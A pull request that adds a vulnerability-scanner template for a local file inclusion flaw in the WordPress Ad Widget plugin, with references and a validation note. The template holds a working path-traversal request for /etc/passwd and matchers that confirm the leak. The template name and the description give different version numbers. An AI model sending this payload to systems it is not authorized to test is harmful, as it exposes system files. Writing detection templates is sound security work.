### PR TITLE
Create wp-plugin-ad-widget-lfi.yaml

### DIFF
--- a/vulnerabilities/wordpress/ad-widget-lfi.yaml
+++ b/vulnerabilities/wordpress/ad-widget-lfi.yaml
@@ -1,4 +1,5 @@
-id: wp-plugin-ad-widget-lfi
+id: ad-widget-lfi
+
 info:
   name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
   author: 0x_Akoko

--- a/wp-plugin-ad-widget-lfi.yaml
+++ b/wp-plugin-ad-widget-lfi.yaml
@@ -1,0 +1,26 @@
+id: wp-plugin-ad-widget-lfi
+info:
+  name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
+  author: 0x_Akoko
+  severity: high
+  description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2017100084
+    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

WordPress Ad Widget 2.10.0 Local File Inclusion

Version Afected :  2.10.0 and below
Vendor Home page :
https://wordpress.org/plugins/ad-widget/
https://github.com/broadstreetads/wordpress-ad-widget
References:
    - https://cxsecurity.com/issue/WLB-2017100084
    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget

### Template Validation

I've validated this template locally?
- YES
